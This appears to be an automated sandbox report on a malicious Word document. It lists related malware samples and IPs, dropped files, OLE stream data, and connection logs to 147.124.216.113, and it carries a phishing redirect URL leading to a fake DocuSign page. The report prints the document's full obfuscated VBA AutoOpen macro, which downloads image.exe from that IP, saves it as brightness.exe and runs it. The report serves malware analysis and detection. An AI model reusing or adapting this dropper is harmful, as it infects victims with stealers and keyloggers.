              https://www.google.com/url?q=YG2GERTSbxgfeaGh1Yi5pby8yODY0MDkxOTEyNjI3MjNkMzQzMGNlYjE1ZTRjZjNlZWUwMTM5NGMyMDk3MmRmYTllZTBkMzUzMDBlZDFjOWNjMjdhNWZiYmM0OTU1ODkzMjEyMjI5MjAwOTkviinbsewtyuas53D1e4a0cefd8db4ad28e54c10117f7d498%2526i%253DNjI2YjE3MTBiZWI4YTgxMWUwNDIxNzE3%2526p%253Dm%2526s%253DAVNPUEhUT0NFTkNSWVBUSVYmhcLGCIsQzpMqHgYCBBo2kwEPWKEfFaahaLsnpofO4A%2526t%253DM3dHV0ZCT2t4azAvRVhKQ3B1ZC95RFFTdmpSMCt3cEFxWHJocUMzM0EyZz0%25253D%2526u%253DaHR0cHM6Ly9tLmV4YWN0YWcuY29tL2NsLmFzcHg_ZXh0UHJvdkFwaT1zaXh0L&sa=t&url=amp%2Fdlocumndjkacheckckoqingnmlcsoftlineon-secure-portal.us-iad-10.linodeobjects.com/newdocusign.html#Tdcjoiletuzn43fqnlhtwn8dbfakjhsdbfjhasbdfkjasbdkf%20ashjdbaksdbfkjasbdbfadGet hashmaliciousUnknownBrowse
              • 208.109.228.27
              yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              fuckunix.arm.elfGet hashmaliciousMiraiBrowse
              • 50.62.7.191
              Josho.x86.elfGet hashmaliciousUnknownBrowse
              • 72.167.237.175
              DRlFlg7OV8.lnkGet hashmaliciousUnknownBrowse
              • 166.62.28.147
              arm7.elfGet hashmaliciousMirai, MoobotBrowse
              • 192.169.229.195
              AC-AS-1USPayment Swift CopyMT103.exeGet hashmaliciousRemcos, PureLog StealerBrowse
              • 147.124.212.172
              Customer.exeGet hashmaliciousXWormBrowse
              • 147.124.210.158
              ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 147.124.216.113
              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 147.124.216.113
              ppc.elfGet hashmaliciousUnknownBrowse
              • 147.124.39.73
              loligang.sh4.elfGet hashmaliciousMiraiBrowse
              • 65.217.170.6
              scheduledllama.exeGet hashmaliciousRedLineBrowse
              • 147.124.222.241
              i686.elfGet hashmaliciousUnknownBrowse
              • 147.124.15.84
              5r3fqt67ew531has4231.m68k.elfGet hashmaliciousMirai, OkiruBrowse
              • 147.124.15.46
              No context
              No context
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):512
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3::
              MD5:BF619EAC0CDF3F68D496EA9344137E8B
              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
              Malicious:false
              Reputation:high, very likely benign file
              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):162
              Entropy (8bit):2.731791025358267
              Encrypted:false
              SSDEEP:3:KVGl/lilKlRAGl3p0DV10QPlfll+7wnN+RP2D:KVy/4KDlpcV10QoEN+RA
              MD5:504196959B980CC39FFB8B36C5BCBBF5
              SHA1:E28FB579FCCB3095B4BCDFC57E03BE9B555F12D5
              SHA-256:860F93F61D62705B805B2FC1591C05C78153B591E099FBB3DD94FFB249B28F27
              SHA-512:2361C26C51F752C6CF240AAB588FEFFAE97EFA92F0FFC189DF30379549C9986AEE0BF2F4428491A98EC1071E5B4105AA6069A80818745FF8F5DD080D7C4393C4
              Malicious:false
              Reputation:low
              Preview:.user..................................................j.o.n.e.s...3.`.......s......P.u..a.i............................................W..|$..}..i.........=.i
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1161216
              Entropy (8bit):7.188493218292404
              Encrypted:false
              SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
              MD5:483AB6BD562B28782D0999ABEC4F57F5
              SHA1:B758556AF2B98708B97A6C3BDBD1E9F2905ED690
              SHA-256:E5393C34240B7E1B8A35052D7E151C324A4AA6424B5A6E1A45717157042FB9AB
              SHA-512:6F3F60153B3C4B1A780C80D59A4E17D8C109F57A1380F73B50498AC85A081B804D0F7C0FFADE4AC193656B3135DEDDDCD607121D9571B4C3BAF34103E36D129D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 75%
              Reputation:low
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................
              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: GRACE, Template: Normal.dotm, Last Saved By: GRACE, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Jan 7 08:57:00 2025, Last Saved Time/Date: Tue Jan 7 08:57:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
              Entropy (8bit):7.058184259014953
              TrID:
              • Microsoft Word document (32009/1) 54.23%
              • Microsoft Word document (old ver.) (19008/1) 32.20%
              • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
              File name:zYj1wg0cM2.doc
              File size:146'944 bytes
              MD5:3db6baf168cecc916012a59b6530175a
              SHA1:7d74c680b09f982271a50483ce350a5b3d9a0996
              SHA256:96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
              SHA512:5a4b22f622559b8db815b1dc8cfa206eb433e55541de7d2540bd786703a0a418d03d1b657bcbdf9ceff74c863a1c7e4d324e3a555fd66d0905034ccdf5d677c5
              SSDEEP:1536:F7dgmjjy2lQkySTUb2roegTK+g9WomfaQjSqttJnkL5mS9kBwNR42qe3/w:FZPjbTU+J799IjSqtteL5N9kBF27
              TLSH:AEE3C447A9458B43E03493B5BE435FAD2F197E0CA9866AEF11273E9B3D302324D4E16D
              File Content Preview:........................>......................................................................................................................................................................................................................................
              Icon Hash:35e1cc889a8a8599
              Document Type:OLE
              Number of OLE Files:1
              Has Summary Info:
              Application Name:Microsoft Office Word
              Encrypted Document:False
              Contains Word Document Stream:True
              Contains Workbook/Book Stream:False
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:False
              Flash Objects Count:0
              Contains VBA Macros:True
              Code Page:1252
              Title:
              Subject:
              Author:GRACE
              Keywords:
              Comments:
              Template:Normal.dotm
              Last Saved By:GRACE
              Revion Number:2
              Total Edit Time:60
              Create Time:2025-01-07 08:57:00
              Last Saved Time:2025-01-07 08:57:00
              Number of Pages:1
              Number of Words:0
              Number of Characters:1
              Creating Application:Microsoft Office Word
              Security:0
              Document Code Page:1252
              Number of Lines:1
              Number of Paragraphs:1
              Thumbnail Scaling Desired:False
              Company:
              Contains Dirty Links:False
              Shared Document:False
              Changed Hyperlinks:False
              Application Version:983040
              General
              Stream Path:Macros/VBA/ThisDocument
              VBA File Name:ThisDocument.cls
              Stream Size:4808
              Data ASCII:. . . . . . . . V . . . . . . . . . ] . . . . . . . . . . . . . . 8 . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h .
              Data Raw:01 16 01 00 01 f0 00 00 00 56 05 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 5d 05 00 00 81 0f 00 00 00 00 00 00 01 00 00 00 38 20 08 6e 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Attribute VB_Name = "ThisDocument"
              Attribute VB_Base = "1Normal.ThisDocument"
              Attribute VB_GlobalNameSpace = False
              Attribute VB_Creatable = False
              Attribute VB_PredeclaredId = True
              Attribute VB_Exposed = True
              Attribute VB_TemplateDerived = True
              Attribute VB_Customizable = True
              Sub AutoOpen()
               
              Dim xHttp:
              'this is a comment
              
              
              
              Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
              'this is a comment
              Dim bStrm:
              'this is a comment
              Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")
              
              
              
              Dim nirm1
              nirm1 = "h"
              Dim nirm2
              nirm2 = "t"
              Dim nirm3
              nirm3 = "t" & "p:/" & "/147.124.216.113/image"
              Dim nirm4
              nirm4 = "."
              Dim nirm5
              nirm5 = "e"
              Dim nirm6
              nirm6 = "x"
              Dim nirm7
              nirm7 = "e"
              
              
              
              Dim plpl
              plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7
              
              'this is a comment
              xHttp.Open "GET", plpl, False
              xHttp.Send
              
              
              
              
               
              With bStrm
               .Type = 1
              .Open
               .write xHttp.responsebody
               
               'this is a comment
               
              Dim monu1
               monu1 = "brightness"
               Dim monu2
               monu2 = "."
               'this is a comment
               Dim monu3
               monu3 = "e"
               'this is a comment
               Dim monu4
               monu4 = "x"
               'this is a comment
               Dim monu5
               monu5 = "e"
               'this is a comment
               Dim monu6
               monu6 = monu1 & monu2 & monu3 & monu4 & monu5
               
               
               .savetofile monu6, 2
              
              
              Dim parveen1
              Dim parveen2
              Dim parveen3
              Dim parveen4
              Dim praveen1
              praveen1 = """brightness"
              Dim praveen2
              praveen2 = "."
              'this is a comment
              Dim praveen3
              praveen3 = "e"
              'this is a comment
              Dim praveen4
              praveen4 = "x"
              'this is a comment
              Dim praveen5
              praveen5 = "e"""
              'this is a comment
              
              
              
              Dim praveen6
              praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
               
              
              
              End With
               
              Shell (praveen6)
               
              End Sub
              

              General
              Stream Path:\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.235956365095031
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              General
              Stream Path:\x5DocumentSummaryInformation
              CLSID:
              File Type:data
              Stream Size:4096
              Entropy:0.24379920956187054
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
              General
              Stream Path:\x5SummaryInformation
              CLSID:
              File Type:data
              Stream Size:4096
              Entropy:0.46196969653588177
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G R A C E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
              General
              Stream Path:1Table
              CLSID:
              File Type:data
              Stream Size:7019
              Entropy:5.867058948447899
              Base64 Encoded:True
              Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
              Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
              General
              Stream Path:Data
              CLSID:
              File Type:dBase III DBT, version number 0, next free block index 113648, 1st item "TRC"
              Stream Size:113648
              Entropy:7.649737008358478
              Base64 Encoded:True
              Data ASCII:. . D . d . . . . . . . . . . . . . . . . . . . . . / = ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . s . . > . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . R . . , . . . . Z . . 7 J 2 9 ( . . . . . . . . D . . . . . . F . . . . Z . . 7 J 2 9 ( . . J F I F . . . . . . . . . I C C _ P R O F I L E . . . . . . . . . . . . . . . m n
              Data Raw:f0 bb 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 2f e0 3d 60 03 ca 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 70 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 73 00 0b f0 3e 00 00 00 7f 00 80 00 e1 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00
              General
              Stream Path:Macros/PROJECT
              CLSID:
              File Type:ASCII text, with CRLF line terminators
              Stream Size:372
              Entropy:5.247850066443211
              Base64 Encoded:True
              Data ASCII:I D = " { D 4 8 8 9 9 2 A - D A 8 5 - 4 B 5 A - 9 B F 1 - 3 D A F D 4 9 5 8 A 0 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 E 1 C 1 1 2 9 1 1 2 9 1 7 2 D 1 7 2 D 1 7 2 D 1 7 2 D " . . D P B = " 2 0 2 2 2 F 3 0 3 0 3 0 3 0 3 0 " . . G C = " 2 2 2 0 2 D 2 D 2 E 2 E 2 E 2 E D 1 " . . . . [ H o s t E x t e n d e r I n f o ] . .
              Data Raw:49 44 3d 22 7b 44 34 38 38 39 39 32 41 2d 44 41 38 35 2d 34 42 35 41 2d 39 42 46 31 2d 33 44 41 46 44 34 39 35 38 41 30 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
              General
              Stream Path:Macros/PROJECTwm
              CLSID:
              File Type:data
              Stream Size:41
              Entropy:3.0773844850752607
              Base64 Encoded:False
              Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
              Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
              General
              Stream Path:Macros/VBA/_VBA_PROJECT
              CLSID:
              File Type:data
              Stream Size:2910
              Entropy:4.347263611919823
              Base64 Encoded:False
              Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
              Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
              General
              Stream Path:Macros/VBA/dir
              CLSID:
              File Type:VAX-order 68k Blit mpx/mux executable
              Stream Size:522
              Entropy:6.254646838582843
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . 9 . i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . # m . . A ! O f f i c g O D . f . i . c g
              Data Raw:01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 39 c8 8f 69 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
              General
              Stream Path:WordDocument
              CLSID:
              File Type:data
              Stream Size:4096
              Entropy:1.0819123923304879
              Base64 Encoded:False
              Data ASCII:. Y . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j [ [ . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . \\ 9 . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . 0 . . . . . . . . .
              Data Raw:ec a5 c1 00 59 e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 39 a3 0a 5c 39 a3 0a 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
              TimestampSource PortDest PortSource IPDest IP
              Jan 10, 2025 08:58:46.946928024 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:46.952003956 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:46.952094078 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:46.952234983 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:46.957036018 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.577908039 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.577927113 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.577936888 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.578007936 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.578016996 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.578022003 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.578077078 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.578454971 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.617119074 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.617173910 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.617203951 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.617254019 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.617285967 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.617320061 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.617331028 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.617331028 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.617547035 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.617780924 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.617851019 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.617949963 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.668498993 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.668513060 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.668523073 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.668615103 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.668625116 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.668659925 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.668742895 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.668946028 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.668979883 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.669014931 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.669018030 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.669121027 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.669342995 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.669374943 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.669408083 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.669423103 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.707788944 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.707995892 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.708033085 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708061934 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708095074 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708127975 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708159924 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708199024 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.708199024 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.708462954 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708524942 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.708534956 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708566904 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708600998 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708626986 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.708633900 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.708722115 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.709345102 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.709377050 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.709408998 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.709431887 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.709721088 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.709778070 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.709827900 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.759083033 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.759103060 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.759110928 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.759253979 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.759254932 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.759344101 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.759354115 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.759362936 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.759428024 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.759442091 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:58:57.759541035 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:58:57.759880066 CET8049736147.124.216.113192.168.2.4
